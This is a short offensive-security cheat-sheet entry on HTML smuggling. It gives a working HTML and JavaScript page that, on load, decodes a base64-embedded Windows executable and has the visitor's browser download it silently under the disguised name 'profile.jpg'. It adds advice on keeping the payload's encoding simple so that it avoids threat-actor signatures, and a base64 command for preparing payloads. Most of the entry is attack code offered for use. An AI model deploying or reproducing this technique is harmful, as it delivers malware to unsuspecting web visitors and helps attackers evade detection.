HTTP smuggling

Automatically download files just by visiting a page, html: * base64 encoded only * sometimes more encryption is not the best as it matches signatures from known threat actors. * downloads a file called profile.jpg

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
    <html>
    <body>  
    <script>        
        function base64ToArrayBuffer(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array( len );
            for (var i = 0; i < len; i++) {
                bytes[i] = binary_string.charCodeAt(i);
            }
            return bytes.buffer;
        }

        file ="TVqQAAMAA..."
        data = base64ToArrayBuffer(file);
        blob = new Blob([data], {type: 'octet/stream'});
        fileName = 'profile.jpg';

        var a = document.createElement('a');
        document.body.appendChild(a);
        a.style = 'display: none';
        var url = window.URL.createObjectURL(blob);
        a.href = url;
        a.download = fileName;
        a.click();
        window.URL.revokeObjectURL(url);
    </script>
    </body> 
    </html>

Create the base64 payloads: - -w 0, removes line wrapping. 

1
base64 -w 0 <payload-to-download> | xclip -sel clipboard